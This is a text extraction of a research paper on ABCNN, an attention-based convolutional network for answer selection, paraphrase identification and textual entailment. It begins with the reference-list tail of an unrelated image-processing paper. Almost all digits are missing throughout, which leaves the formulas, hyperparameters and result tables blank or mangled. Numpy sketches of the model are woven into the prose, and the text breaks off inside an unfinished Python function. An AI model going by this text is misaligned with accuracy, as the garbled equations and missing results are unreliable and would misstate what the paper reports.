– doi . / . . petschnigg g, agrawala m, hoppe h, szeliski r, cohen m, toyama k. . 
digital photography with flash and no-flash image pairs. in: acm transactions on graphics (proceedings of siggraph). new york: acm press.
tomasi c, manduchi r. bilateral filtering for gray and color images. in: proceedings of the ieee sixth international conference on computer vision. piscataway: ieee.
zhang q, shen x, xu l, jia j. rolling guidance filter. in: fleet d, pajdla t, schiele b, tuytelaars t, eds. computer vision—eccv: th european conference, part iii. cham: springer international publishing.

abcnn: attention-based convolutional neural network for modeling sentence pairs
wenpeng yin, hinrich schütze (center for information and language processing, lmu munich, germany; wenpeng@cis.lmu.de)
bing xiang, bowen zhou (ibm watson, yorktown heights, ny, usa; {bingxia,zhou}@us.ibm.com)

abstract. how to model a pair of sentences is a critical issue in many nlp tasks such as answer selection (as), paraphrase identification (pi) and textual entailment (te). most prior work (i) deals with one individual task by fine-tuning a specific system; (ii) models each sentence's representation separately, rarely considering the impact of the other sentence; or (iii) relies fully on manually designed, task-specific linguistic features. this work presents a general attention based convolutional neural network (abcnn) for modeling a pair of sentences. we make three contributions. (i) the abcnn can be applied to a wide variety of tasks that require modeling of sentence pairs. (ii) we propose three attention schemes that integrate mutual influence between sentences into cnns; thus, the representation of each sentence takes into consideration its counterpart. these interdependent sentence pair representations are more powerful than isolated sentence representations. (iii) abcnns achieve state-of-the-art performance on as, pi and te tasks. we release code at: https://github.com/yinwenpeng/answer_selection.

introduction
how to model a pair of sentences is a critical issue in many nlp tasks such as answer selection (as) (yu et al.; feng et al.), paraphrase identification (pi) (madnani et al.; yin and schütze, a), textual entailment (te) (marelli et al., a; bowman et al., a) etc.

figure : positive (<s, s+>) and negative (<s, s−>) examples for as, pi and te tasks. rh = random house.
- as: s "how much did waterboy gross?"; s+ "the movie earned $ . million"; s− "this was jerry reed's final film appearance"
- pi: s "she struck a deal with rh to pen a book today"; s+ "she signed a contract with rh to write a book"; s− "she denied today that she struck a deal with rh"
- te: s "an ice skating rink placed outdoors is full of people"; s+ "a lot of people are in an ice skating park"; s− "an ice skating rink placed indoors is full of people"

most prior work derives each sentence's representation separately, rarely considering the impact of the other sentence. this neglects the mutual influence of the two sentences in the context of the task. it also contradicts what humans do when comparing two sentences. we usually focus on key parts of one sentence by extracting parts from the other sentence that are related by identity, synonymy, antonymy and other relations. thus, human beings model the two sentences together, using the content of one sentence to guide the representation of the other.
figure demonstrates that each sentence of a pair partially determines which parts of the other sen- tence we must focus on. for as, correctly answer- ing s requires attention on “gross”: s + contains a corresponding unit (“earned”) while s− does not. for pi, focus should be removed from “today” to correctly recognize < s , s + > as paraphrases and < s , s − > as non-paraphrases. for te, we need to focus on “full of people” (to recognize te for <s , s + >) and on “outdoors” / “indoors” (to recog- nize non-te for < s , s − >). these examples show the need for an architecture that computes different representations of si for different s −i (i ∈{ , }). https://github.com/yinwenpeng/answer_selection https://github.com/yinwenpeng/answer_selection convolutional neural networks (cnns) (lecun et al., ) are widely used to model sentences (kalchbrenner et al., ; kim, ) and sen- tence pairs (socher et al., ; yin and schütze, a), especially in classification tasks. cnns are supposed to be good at extracting robust and abstract features of input. this work presents the abcnn, an attention-based convolutional neural network, that has a powerful mechanism for mod- eling a sentence pair by taking into account the interdependence between the two sentences. the abcnn is a general architecture that can handle a wide variety of sentence pair modeling tasks. some prior work proposes simple mechanisms that can be interpreted as controlling varying atten- tion; e.g., yih et al. ( ) employ word alignment to match related parts of the two sentences. in con- trast, our attention scheme based on cnns models relatedness between two parts fully automatically. moreover, attention at multiple levels of granularity, not only at word level, is achieved as we stack mul- tiple convolution layers that increase abstraction. prior work on attention in deep learning (dl) mostly addresses long short-term memory networks (lstms) (hochreiter and schmidhuber, ). lstms achieve attention usually in a word-to-word scheme, and word representations mostly encode the whole context within the sentence (bahdanau et al., ; rocktäschel et al., ). it is not clear whether this is the best strategy; e.g., in the as ex- ample in figure , it is possible to determine that “how much” in s matches “$ . million” in s without taking the entire sentence contexts into ac- count. this observation was also investigated by yao et al. ( b) where an information retrieval system retrieves sentences with tokens labeled as date by named entity recognition or as cd by pos tagging if there is a “when” question. however, la- bels or pos tags require extra tools. cnns benefit from incorporating attention into representations of local phrases detected by filters; in contrast, lstms encode the whole context to form attention-based word representations – a strategy that is more com- plex than the cnn strategy and (as our experiments suggest) performs less well for some tasks. apart from these differences, it is clear that atten- tion has as much potential for cnns as it does for lstms. as far as we know, this is the first nlp paper that incorporates attention into cnns. our abcnns get state-of-the-art in as and te tasks, and competitive performance in pi, then obtains fur- ther improvements over all three tasks when linguis- tic features are used. related work non-dl on sentence pair modeling. sentence pair modeling has attracted lots of attention in the past decades. many tasks can be reduced to a se- mantic text matching problem. 
in this paper, we adopt the arguments by yih et al. ( ) who ar- gue against shallow approaches as well as against semantic text matching approaches that can be com- putationally expensive: due to the variety of word choices and inherent ambiguities in natural lan- guage, bag-of-word approaches with sim- ple surface-form word matching tend to produce brittle results with poor predic- tion accuracy (bilotti et al., ). as a result, researchers put more emphasis on exploiting syntactic and semantic struc- ture. representative examples include methods based on deeper semantic anal- ysis (shen and lapata, ; moldovan et al., ), tree edit-distance (punyakanok et al., ; heilman and smith, ) and quasi-synchronous grammars (wang et al., ) that match the dependency parse trees of the two sentences. instead of focusing on the high-level semantic rep- resentation, yih et al. ( ) turn their attention to improving the shallow semantic component, lexical semantics, by performing semantic matching based on a latent word-alignment structure (cf. chang et al. ( )). lai and hockenmaier ( ) explore finer- grained word overlap and alignment between two sentences using negation, hypernym, synonym and antonym relations. yao et al. ( a) extend word- to-word alignment to phrase-to-phrase alignment by a semi-markov crf. however, such approaches of- ten require more computational resources. in ad- dition, employing syntactic or semantic parsers – which produce errors on many sentences – to find the best match between the structured representa- tions of two sentences is not trivial. dl on sentence pair modeling. to address some of the challenges of non-dl work, much re- cent work uses neural networks to model sentence pairs for as, pi and te. for as, yu et al. ( ) present a bigram cnn to model question and answer candidates. yang et al. ( ) extend this method and get state-of-the-art performance on the wikiqa dataset (section . ). feng et al. ( ) test various setups of a bi-cnn ar- chitecture on an insurance domain qa dataset. tan et al. ( ) explore bidirectional lstms on the same dataset. our approach is different because we do not model the sentences by two independent neu- ral networks in parallel, but instead as an interdepen- dent sentence pair, using attention. for pi, blacoe and lapata ( ) form sentence representations by summing up word embeddings. socher et al. ( ) use recursive autoencoders (raes) to model representations of local phrases in sentences, then pool similarity values of phrases from the two sentences as features for binary classi- fication. yin and schütze ( a) similarly replace an rae with a cnn. in all three papers, the rep- resentation of one sentence is not influenced by the other – in contrast to our attention-based model. for te, bowman et al. ( b) use recursive neu- ral networks to encode entailment on sick (marelli et al., b). rocktäschel et al. ( ) present an attention-based lstm for the stanford natural lan- guage inference corpus (bowman et al., a). our system is the first cnn-based work on te. some prior work aims to solve a general sen- tence matching problem. hu et al. ( ) present two cnn architectures, arc-i and arc-ii, for sen- tence matching. arc-i focuses on sentence repre- sentation learning while arc-ii focuses on match- ing features on phrase level. both systems were tested on pi, sentence completion (sc) and tweet- response matching. 
yin and schütze ( b) pro- pose the multigrancnn architecture to model gen- eral sentence matching based on phrase matching on multiple levels of granularity and get promising re- sults for pi and sc. wan et al. ( ) try to match two sentences in as and sc by multiple sentence representations, each coming from the local repre- sentations of two lstms. our work is the first one to investigate attention for the general sentence matching task. attention-based dl in non-nlp domains. even though there is little if any work on atten- tion mechanisms in cnns for nlp, attention-based cnns have been used in computer vision for visual question answering (chen et al., ), image clas- sification (xiao et al., ), caption generation (xu et al., ), image segmentation (hong et al., ) and object localization (cao et al., ). mnih et al. ( ) apply attention in recurrent neural networks (rnns) to extract “information from an image or video by adaptively selecting a sequence of regions or locations and only process- ing the selected regions at high resolution.” gre- gor et al. ( ) combine a spatial attention mech- anism with rnns for image generation. ba et al. ( ) investigate attention-based rnns for recog- nizing multiple objects in images. chorowski et al. ( ) and chorowski et al. ( ) use attention in rnns for speech recognition. attention-based dl in nlp. attention-based dl systems have been applied to nlp after their success in computer vision and speech recognition. they mainly rely on rnns and end-to-end encoder- decoders for tasks such as machine translation (bah- danau et al., ; luong et al., ) and text re- construction (li et al., ; rush et al., ). our work takes the lead in exploring attention mecha- nisms in cnns for nlp tasks. bcnn: basic bi-cnn we now introduce our basic (non-attention) cnn that is based on the siamese architecture (brom- ley et al., ), i.e., it consists of two weight- sharing cnns, each processing one of the two sen- tences, and a final layer that solves the sentence pair task. see figure . we refer to this architecture as the bcnn. the next section will then introduce the abcnn, an attention architecture that extends the bcnn. table gives our notational conventions. in our implementation and also in the mathemat- ical formalization of the model given below, we pad the two sentences to have the same length s = max(s , s ). however, in the figures we show dif- ferent lengths because this gives a better intuition of how the model works. we now describe the bcnn’s four types of lay- ers: input, convolution, average pooling and output. symbol description s, s , s sentence or sentence length v word w filter width di dimensionality of input to layer i + w weight matrix table : notation figure : bcnn: abcnn without attention input layer. in the example in the figure, the two input sentences have and words, respectively. each word is represented as a d -dimensional pre- computed word vec (mikolov et al., ) embed- ding, d = . as a result, each sentence is repre- sented as a feature map of dimension d ×s. convolution layer. let v , v , . . . , vs be the words of a sentence and ci ∈ rw·d , < i < s + w, the concatenated embeddings of vi−w+ , . . . , vi where embeddings for vj are set to zero when j < or j > s. we then generate the representation pi ∈ rd for the phrase vi−w+ , . . . , vi using the convolution weights w ∈ rd ×wd as follows: pi = tanh(w ·ci + b) where b ∈ rd is the bias. average pooling layer. 
pooling (including min, max, average pooling) is commonly used to extract robust features from convolution. in this paper, we introduce attention weighting as an alternative, but use average pooling as a baseline as follows. for the output feature map of the last convolu- tion layer, we do column-wise averaging over all columns, denoted as all-ap. this generates a rep- resentation vector for each of the two sentences, shown as the top “average pooling (all-ap)” layer below “logistic regression” in figure . these two vectors are the basis for the sentence pair decision. for the output feature map of non-final convolu- tion layers, we do column-wise averaging over win- dows of w consecutive columns, denoted as w-ap; shown as the lower “average pooling (w-ap)” layer in figure . for filter width w, a convolution layer transforms an input feature map of s columns into a new feature map of s + w − columns; average pooling transforms this back to s columns. this ar- chitecture supports stacking an arbitrary number of convolution-pooling blocks to extract increasingly abstract features. input features to the bottom layer are words, input features to the next layer are short phrases and so on. each level generates more ab- stract features of higher granularity. the last layer is an output layer, chosen accord- ing to the task; e.g., for binary classification tasks, this layer is logistic regression (see figure ). other types of output layers are introduced below. we found that in most cases, performance is boosted if we provide the output of all pooling lay- ers as input to the output layer. for each non-final average pooling layer, we perform w-ap (pooling over windows of w columns) as described above, but we also perform all-ap (pooling over all columns) and forward the result to the output layer. this improves performance because representations from different layers cover the properties of the sentences at different levels of abstraction and all of these lev- els can be important for a particular sentence pair. abcnn: attention-based bcnn we now describe three architectures based on the bcnn, the abcnn- , the abcnn- and the abcnn- , that each introduces an attention mech- anism for modeling sentence pairs; see figure . abcnn- . the abcnn- (figure (a)) em- ploys an attention feature matrix a to influence con- (a) one block in abcnn- (b) one block in abcnn- (c) one block in abcnn- figure : three abcnn architectures volution. attention features are intended to weight those units of si more highly in convolution that are relevant to a unit of s −i (i ∈ { , }); we use the term “unit” here to refer to words on the lowest level and to phrases on higher levels of the network. fig- ure (a) shows two unit representation feature maps in red: this part of the abcnn- is the same as in the bcnn (see figure ). each column is the representation of a unit, a word on the lowest level and a phrase on higher levels. we first describe the attention feature matrix a informally (layer “conv input”, middle column, in figure (a)). a is gener- ated by matching units of the left representation fea- ture map with units of the right representation fea- ture map such that the attention values of row i in a denote the attention distribution of the i-th unit of s with respect to s , and the attention values of col- umn j in a denote the attention distribution of the j-th unit of s with respect to s . a can be viewed as a new feature map of s (resp. s ) in row (resp. col- umn) direction because each row (resp. 
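the plain bcnn machinery underlying all three attention variants — the wide convolution pi = tanh(w·ci + b) over zero-padded windows of w word embeddings, and the two average-pooling variants (w-ap between blocks, all-ap for the sentence vectors) — can be sketched in numpy as follows; dimensions follow the notation above and the weights are assumed to be learned elsewhere.

```python
import numpy as np

def wide_convolution(embeddings, W, b, w):
    # embeddings: (d0, s) sentence feature map; W: (d1, w*d0); b: (d1,)
    # output: (d1, s + w - 1) feature map, one column per zero-padded window of w words
    d0, s = embeddings.shape
    padded = np.concatenate(
        [np.zeros((d0, w - 1)), embeddings, np.zeros((d0, w - 1))], axis=1)
    cols = []
    for i in range(s + w - 1):
        c_i = padded[:, i:i + w].reshape(-1, order='F')   # concatenation of w embeddings
        cols.append(np.tanh(W @ c_i + b))
    return np.stack(cols, axis=1)

def all_ap(feature_map):
    # column-wise average over all columns: one vector per sentence
    return feature_map.mean(axis=1)

def w_ap(feature_map, w):
    # average pooling over windows of w consecutive columns:
    # maps s + w - 1 convolution columns back to s columns
    d, n = feature_map.shape
    s = n - w + 1
    return np.stack([feature_map[:, j:j + w].mean(axis=1) for j in range(s)], axis=1)
```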
column) is a new feature vector of a unit in s (resp. s ). thus, it makes sense to combine this new feature map with the representation feature maps and use both as in- put to the convolution operation. we achieve this by transforming a into the two blue matrices in figure (a) that have the same format as the representation feature maps. as a result, the new input of convolu- tion has two feature maps for each sentence (shown in red and blue). our motivation is that the atten- tion feature map will guide the convolution to learn “counterpart-biased” sentence representations. more formally, let fi,r ∈ rd×s be the represen- tation feature map of sentence i (i ∈ { , }). then we define the attention matrix a ∈ rs×s as follows: ai,j = match-score(f ,r[:, i], f ,r[:, j]) ( ) the function match-score can be defined in a variety of ways. we found that /( + |x − y|) works well where | · | is euclidean distance. given attention matrix a, we generate the atten- tion feature map fi,a for si as follows: f ,a = w ·a>, f ,a = w ·a the weight matrices w ∈ rd×s, w ∈ rd×s are parameters of the model to be learned in training. the weights of the two matrices are shared in our imple- mentation to reduce the number of parameters of the model. we stack the representation feature map fi,r and the attention feature map fi,a as an order tensor and feed it into convolution to generate a higher- level representation feature map for si (i ∈ { , }). in figure (a), s has units, s has . the output of convolution (shown in the top layer, filter width w = ) is a higher-level representation feature map with columns for s and columns for s . abcnn- . the abcnn- computes attention weights directly on the input representation with the aim of improving the features computed by convolu- tion. the abcnn- (figure (b)) instead computes attention weights on the output of convolution with the aim of reweighting this convolution output. in the example shown in figure (b), the feature maps output by convolution for s and s (layer marked “convolution” in figure (b)) have and columns, respectively; each column is the representation of a unit. the attention matrix a compares all units in s with all units of s . we sum all attention values for a unit to derive a single attention weight for that unit. this corresponds to summing all values in a row of a for s (“col-wise sum”, resulting in the column vector of size shown) and summing all values in a column for s (“row-wise sum”, resulting in the row vector of size shown). more formally, let a ∈ rs×s be the attention matrix, a ,j = ∑ a[j, :] the attention weight of unit j in s , a ,j = ∑ a[:, j] the attention weight of unit j in s and fci,r ∈ r d×(si+w− ) the output of convolution for si. then the j-th column of the new feature map fpi,r generated by w-ap is derived by: f p i,r[:, j]= ∑ k=j:j+w ai,kf c i,r[:, k], j = . . . si note that fpi,r ∈ r d×si , i.e., abcnn- pooling generates an output feature map of the same size as the input feature map of convolution. this allows us to stack multiple convolution-pooling blocks to extract features of increasing abstraction. there are three main differences between the abcnn- and the abcnn- . (i) attention in the abcnn- impacts convolution indirectly while at- tention in the abcnn- influences pooling through direct attention weighting. (ii) the abcnn- re- quires the two matrices wi to convert the attention matrix into attention feature maps; and the input to convolution has two times as many feature maps. 
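in code, the quantities defined in this section — the attention matrix a with match-score 1/(1 + euclidean distance), the abcnn-1 attention feature maps w0·aᵀ and w1·a, and the abcnn-2 attention-weighted w-ap — might look as follows; this is an illustrative numpy sketch in which w0 and w1 are assumed to be learned (possibly shared) parameter matrices and each map is a single feature map with units as columns.

```python
import numpy as np

def match_score(x, y):
    # 1 / (1 + euclidean distance) between two unit representations
    return 1.0 / (1.0 + np.linalg.norm(x - y))

def attention_matrix(F1, F2):
    # A[i, j] compares unit i of sentence 1 with unit j of sentence 2
    A = np.empty((F1.shape[1], F2.shape[1]))
    for i in range(F1.shape[1]):
        for j in range(F2.shape[1]):
            A[i, j] = match_score(F1[:, i], F2[:, j])
    return A

def abcnn1_attention_maps(A, W0, W1):
    # abcnn-1: attention feature maps with the same shape as the representation maps
    # (W0: (d, s2), W1: (d, s1); both assumed to be learned weights)
    return W0 @ A.T, W1 @ A

def abcnn2_pooling(conv_out, unit_weights, w):
    # abcnn-2: w-ap in which every convolution column is weighted by its attention
    # weight (row sums of A for sentence 1, column sums of A for sentence 2)
    d, n = conv_out.shape            # n = s + w - 1 columns
    s = n - w + 1
    out = np.zeros((d, s))
    for j in range(s):
        for k in range(j, j + w):
            out[:, j] += unit_weights[k] * conv_out[:, k]
    return out
```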
thus, the abcnn- has more parameters than the abcnn- and is more vulnerable to overfitting. (iii) as pooling is performed after convolution, pool- ing handles larger-granularity units than convolu- tion; e.g., if the input to convolution has word level granularity, then the input to pooling has phrase level granularity, the phrase size being equal to filter size w. thus, the abcnn- and the abcnn- imple- ment attention mechanisms for linguistic units of different granularity. the complementarity of the abcnn- and the abcnn- motivates us to pro- pose the abcnn- , a third architecture that com- bines elements of the two. abcnn- (figure (c)) combines the abcnn- and the abcnn- by stacking them; it combines the strengths of the abcnn- and - by allowing the attention mechanism to operate (i) both on the con- volution and on the pooling parts of a convolution- pooling block and (ii) both on the input granularity and on the more abstract output granularity. experiments we test the proposed architectures on three tasks: answer selection (as), paraphrase identification (pi) and textual entailment (te). common training setup. words are initialized by -dimensional word vec embeddings and not changed during training. a single randomly initial- ized embedding is created for all unknown words by uniform sampling from [-. ,. ]. we employ ada- grad (duchi et al., ) and l regularization. network configuration. each network in the experiments below consists of (i) an initialization block b that initializes words by word vec em- beddings, (ii) a stack of k − convolution-pooling blocks b , . . . , bk, computing increasingly abstract features, and (iii) one final lr layer (logistic regres- sion layer) as shown in figure . the input to the lr layer consists of kn features – each block provides n similarity scores, e.g., n cosine similarity scores. figure shows the two sentence vectors output by the final block bk of the stack (“sentence representation ”, “sentence repre- sentation ”); this is the basis of the last n similarity scores. as we explained in the final paragraph of section , we perform all-ap pooling for all blocks, as pi te #c l lr w l lr w l lr w l abcnn- . . . . . . abcnn- . . . . . . abcnn- . . . . . . abcnn- . . . . . . abcnn- . . . . . . abcnn- . . . . . . table : hyperparameters. lr: learning rate. #cl: num- ber convolution layers. w: filter width. the number of convolution kernels di (i > ) is throughout. not just for bk. thus we get one sentence representa- tion each for s and s for each block b , . . . , bk. we compute n similarity scores for each block (based on the block’s two sentence representations). thus, we compute a total of kn similarity scores and these scores are input to the lr layer. depending on the task, we use different methods for computing the similarity score: see below. layerwise training. in our training regime, we first train a network consisting of just one convolution-pooling block b . we then create a new network by adding a block b , initialize its b block with the previously learned weights for b and train b keeping the previously learned weights for b fixed. we repeat this procedure until all k − convolution-pooling blocks are trained. we found that this training regime gives us good performance and shortens training times considerably. 
since sim- ilarity scores of lower blocks are kept unchanged once they have been learned, this also has the nice effect that “simple” similarity scores (those based on surface features) are learned first and subsequent training phases can focus on complementary scores derived from more complex abstract features. classifier. we found that performance increases if we do not use the output of the lr layer as the final decision, but instead train a linear svm or a logistic regression with default parameters directly on the input to the lr layer (i.e., on the kn similarity scores that are generated by the k-block stack after network training is completed). direct training of svms/lr seems to get closer to the global optimum than gradient descent training of cnns. table shows hyperparameters, tuned on dev. we use addition and lstms as two shared base- lines for all three tasks, i.e., for as, pi and te. we http://scikit-learn.org/stable/ for both. http://scikit-learn.org/stable/ now describe these two shared baselines. (i) addition. we sum up word embeddings element-wise to form each sentence representation. the classifier input is then the concatenation of the two sentence representations. (ii) a-lstm. be- fore this work, most attention mechanisms in nlp were implemented in recurrent neural networks for text generation tasks such as machine translation (e.g., bahdanau et al. ( ), luong et al. ( )). rocktäschel et al. ( ) present an attention-lstm for natural language inference. since this model is the pioneering attention based rnn system for sen- tence pair classification, we consider it as a baseline system (“a-lstm”) for all our three tasks. the a- lstm has the same configuration as our abcnns in terms of word initialization ( -dimensional word vec embeddings) and the dimensionality of all hidden layers ( ). . answer selection we use wikiqa, an open domain question-answer dataset. we use the subtask that assumes that there is at least one correct answer for a question. the corresponding dataset consists of , question- candidate pairs in train, , pairs in dev and , pairs in test where we adopt the standard setup of only considering questions with correct answers in test. following yang et al. ( ), we truncate an- swers to tokens. the task is to rank the candidate answers based on their relatedness to the question. evaluation mea- sures are mean average precision (map) and mean reciprocal rank (mrr). task-specific setup. we use cosine similarity as the similarity score for as. in addition, we use sen- tence lengths, wordcnt (count of the number of non- stopwords in the question that also occur in the an- swer) and wgtwordcnt (reweight the counts by the idf values of the question words). thus, the final input to the lr layer has size k + : one cosine for each of the k blocks and the four additional features. we compare with seven baselines. the first three are considered by yang et al. ( ): (i) wordcnt; (ii) wgtwordcnt; (iii) cnn-cnt (the state-of-the- art system): combine cnn with (i) and (ii). apart from the baselines considered by yang et al. ( ), http://aka.ms/wikiqa (yang et al., ) method map mrr b as el in es wordcnt . . wgtwordcnt . . cnn-cnt . . addition . . addition(+) . . a-lstm . . a-lstm(+) . . bcnn one-conv . . two-conv . . abcnn- one-conv . ∗ . ∗ two-conv . ∗ . ∗ abcnn- one-conv . ∗ . ∗ two-conv . ∗ . ∗ abcnn- one-conv . ∗ . ∗ two-conv . ∗ . ∗ table : results on wikiqa. best result per column is bold. 
significant improvements over state-of-the-art baselines (underlined) are marked with ∗ (t-test, p < . ). we compare with two addition baselines and two lstm baselines. addition and a-lstm are the shared baselines described before. we also combine both with the four extra features; this gives us two additional baselines that we refer to as addition(+) and a-lstm(+). results. table shows performance of the base- lines, of the bcnn and of the three abcnns. for cnns, we test one (one-conv) and two (two-conv) convolution-pooling blocks. the non-attention network bcnn already per- forms better than the baselines. if we add attention mechanisms, then the performance further improves by several points. comparing the abcnn- with the abcnn- , we find the abcnn- is slightly better even though the abcnn- is the simpler ar- chitecture. if we combine the abcnn- and the abcnn- to form the abcnn- , we get further improvement. this can be explained by the abcnn- ’s abil- ity to take attention of finer-grained granularity into consideration in each convolution-pooling block while the abcnn- and the abcnn- consider at- tention only at convolution input or only at pooling input, respectively. we also find that stacking two convolution-pooling blocks does not bring consis- tent improvement and therefore do not test deeper architectures. if we limit the input to the lr layer to the k similarity scores in the abcnn- (two-conv), results are . (map) / . (mrr). http://aka.ms/wikiqa . paraphrase identification we use the microsoft research paraphrase (msrp) corpus (dolan et al., ). the training set contains true / false and the test set true / false paraphrase pairs. we randomly select pairs from train and use them as dev; but we still report results for training on the entire training set. for each triple (label, s , s ) in the training set, we also add (label, s , s ) to the training set to make best use of the training data. systems are evaluated by accuracy and f . task-specific setup. in this task, we add the mt features from (madnani et al., ) and the lengths of the two sentences. in addition, we compute rouge- , rouge- and rouge-su (lin, ), which are scores measuring the match between the two sentences on (i) unigrams, (ii) bi- grams and (iii) unigrams and skip-bigrams (maxi- mum skip distance of four), respectively. in this task, we found transforming euclidean distance into similarity score by /( + |x − y|) performs better than cosine similarity. additionally, we use dynamic pooling (yin and schütze, a) of the attention matrix a in equation ( ) and forward pooled val- ues of all blocks to the classifier. this gives us bet- ter performance than only forwarding sentence-level matching features. we compare our system with representative dl approaches: (i) a-lstm; (ii) a-lstm(+): a- lstm plus handcrafted features; (iii) rae (socher et al., ), recursive autoencoder; (iv) bi-cnn- mi (yin and schütze, a), a bi-cnn architec- ture; and (v) mpssm-cnn (he et al., ), the state-of-the-art nn system for pi, and the follow- ing four non-dl systems: (vi) addition; (vii) ad- dition(+): addition plus handcrafted features; (viii) mt (madnani et al., ), a system that combines machine translation metrics; (ix) mf-tf-kld (ji and eisenstein, ), the state-of-the-art non-nn system. results. table shows that the bcnn is slightly worse than the state-of-the-art whereas the abcnn- roughly matches it. the abcnn- is slightly above the state-of-the-art. 
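for completeness, the two surface-overlap features used in the as task-specific setup above, wordcnt and wgtwordcnt, are simple to compute; the sketch below assumes tokenised inputs, a stopword set and a precomputed idf lookup, none of which are specified further in the text.

```python
def as_overlap_features(question_tokens, answer_tokens, stopwords, idf):
    # wordcnt: number of non-stopword question tokens that also occur in the answer
    # wgtwordcnt: the same count, reweighted by the idf values of the question words
    answer = set(answer_tokens)
    matched = [t for t in question_tokens if t not in stopwords and t in answer]
    wordcnt = float(len(matched))
    wgtwordcnt = float(sum(idf.get(t, 0.0) for t in matched))
    return wordcnt, wgtwordcnt
```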
the abcnn- outper- for better comparability of approaches in our experiments, we use a simple svm classifier, which performs slightly worse than madnani et al. ( )’s more complex meta-classifier. method acc f b as el in es majority voting . . rae . . bi-cnn-mi . . mpssm-cnn . . mt . . mf-tf-kld . . addition . . addition (+) . . a-lstm . . a-lstm (+) . . bcnn one-conv . . two-conv . . abcnn- one-conv . . two-conv . . abcnn- one-conv . . two-conv . . abcnn- one-conv . . two-conv . . table : results for pi on msrp forms the state-of-the-art in accuracy and f . two convolution layers only bring small improvements over one. . textual entailment semeval task (marelli et al., a) eval- uates system predictions of textual entailment (te) relations on sentence pairs from the sick dataset (marelli et al., b). the three classes are entail- ment, contradiction and neutral. the sizes of sick train, dev and test sets are , and pairs, respectively. we call this dataset orig. we also create nonover, a copy of orig in which words occurring in both sentences are re- moved. a sentence in nonover is denoted by the special token <empty> if all words are removed. table shows three pairs from orig and their trans- formation in nonover. we observe that focusing on the non-overlapping parts provides clearer hints for te than orig. in this task, we run two copies of each network, one for orig, one for nonover; these two networks have a single common lr layer. like lai and hockenmaier ( ), we train our final system (after fixing hyperparameters) on train and dev ( pairs). eval measure is accuracy. task-specific setup. we found that for this task forwarding two similarity scores from each block improvement of . (acc) and . (f ) over state-of-the-art is not significant. the abcnn- (two-conv) without “linguistic” features (i.e., mt and rouge) achieves . / . . orig nonover children in red shirts are children red shirts playing in the leaves playing three kids are sitting in the leaves three kids sitting three boys are jumping in the leaves boys three kids are jumping in the leaves kids a man is jumping into an empty pool an empty a man is jumping into a full pool a full table : sick data: converting the original sentences (orig) into the nonover format (instead of just one) is helpful. we use cosine sim- ilarity and euclidean distance. as we did for para- phrase identification, we add the mt features for each sentence pair for this task as well; our motiva- tion is that entailed sentences resemble paraphrases more than contradictory sentences do. we use the following linguistic features. nega- tion is important for detecting contradiction. fea- ture neg is set to if either sentence contains “no”, “not”, “nobody”, “isn’t” and to otherwise. fol- lowing lai and hockenmaier ( ), we use word- net (miller, ) to detect nyms: synonyms, hy- pernyms and antonyms in the pairs. but we do this on nonover (not on orig) to focus on what is critical for te. specifically, feature syn is the number of word pairs in s and s that are syn- onyms. hyp (resp. hyp ) is the number of words in s (resp. s ) that have a hypernym in s (resp. s ). in addition, we collect all potential antonym pairs (pap) in nonover. we identify the matched chunks that occur in contradictory and neutral, but not in entailed pairs. we exclude synonyms and hy- pernyms and apply a frequency filter of n = . in contrast to lai and hockenmaier ( ), we con- strain the pap pairs to cosine similarity above . in word vec embedding space as this discards many noise pairs. 
feature ant is the number of matched pap antonyms in a sentence pair. as before we use sentence lengths, both for orig (len o: length s , len o: length s ) and for nonover (len n: length s , len n: length s ). on the whole, we have extra features: mt metrics, neg, syn, hyp , hyp , ant, len o, len o, len n and len n. apart from the addition and lstm baselines, we further compare with the top- systems in semeval and trrntn (bowman et al., b), a recursive neural network developed for this sick task. method acc s em - e va l to p (jimenez et al., ) . (zhao et al., ) . (lai and hockenmaier, ) . trrntn (bowman et al., b) . addition no features . plus features . a-lstm no features . plus features . bcnn one-conv . two-conv . abcnn- one-conv . two-conv . abcnn- one-conv . two-conv . abcnn- one-conv . ∗ two-conv . ∗ table : results on sick. significant improvements over (lai and hockenmaier, ) are marked with ∗ (test of equal proportions, p < . ). results. table shows that our cnns outper- form a-lstm (with or without linguistic features added) and the top three semeval systems. compar- ing abcnns with the bcnn, attention mechanisms consistently improve performance. the abcnn- has performance comparable to the abcnn- while the abcnn- is better still: a boost of . points compared to the previous state of the art. visual analysis. figure visualizes the attention matrices for one te sentence pair in the abcnn- for blocks b (unigrams), b (first convolutional layer) and b (second convolutional layer). darker shades of blue indicate stronger attention values. in figure (top), each word corresponds to ex- actly one row or column. we can see that words in si with semantic equivalents in s −i get high atten- tion while words without semantic equivalents get low attention, e.g., “walking” and “murals” in s and “front” and “colorful” in s . this behavior seems reasonable for the unigram level. rows/columns of the attention matrix in figure (middle) correspond to phrases of length three since filter width w = . high attention values generally correlate with close semantic correspondence: the phrase “people are” in s matches “several people are” in s ; both “are walking outside” and “walking outside the” in s match “are in front” in s ; “the building that” in s matches “a colorful building” in if we run the abcnn- (two-conv) without the linguis- tic features, performance is . . several people are in front of a colorful building people are walking outside the building that has several murals on it se ve ra l se ve ra l p eo pl e se ve ra l p eo pl e ar e p eo pl e ar e in ar e in fr on t in fr on t o f fr on t o f a of a c ol or fu l a co rlo rf ul b ui ld in g co rlo rf ul b ui ld in g bu ild in g people people are people are walking are walking outside walking outside the outside the building the building that building that has that has several has several murals several murals on murals on it on it it se ve ra l se ve ra l p eo pl e se ve ra l.. .a re se ve ra l.. .in se ve ra l.. .fr on t pe op le ... of ar e. ..a in ... co lo rf ul fr on t.. .b ui ld in g of ... bu ild in g a. ..b ui ld in g people people are people...walking people...outside people...the are...building walking...that outside...has the...several building...murals that...on has...it several...it murals...it figure : attention visualization for te. top: unigrams, b . middle: conv , b . bottom: conv , b . s . 
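the te-specific preprocessing and features described above lend themselves to short helpers; the sketch below is one reading of the text — the nonover transformation drops every token shared by the two sentences, neg fires on the negation cues quoted above, and syn counts cross-sentence synonym pairs given some synonym lookup (e.g., built from wordnet). the exact cue list and the lookup structure are assumptions.

```python
NEGATION_CUES = {"no", "not", "nobody", "isn't"}   # cues quoted in the text; the full list may differ

def to_nonover(tokens1, tokens2):
    # nonover view of a pair: remove tokens occurring in both sentences;
    # a sentence that becomes empty is replaced by the special token <empty>
    shared = set(tokens1) & set(tokens2)
    keep1 = [t for t in tokens1 if t not in shared] or ["<empty>"]
    keep2 = [t for t in tokens2 if t not in shared] or ["<empty>"]
    return keep1, keep2

def neg_feature(tokens1, tokens2):
    # 1 if either sentence contains a negation cue, else 0
    return int(bool((set(tokens1) | set(tokens2)) & NEGATION_CUES))

def syn_feature(tokens1, tokens2, synonyms):
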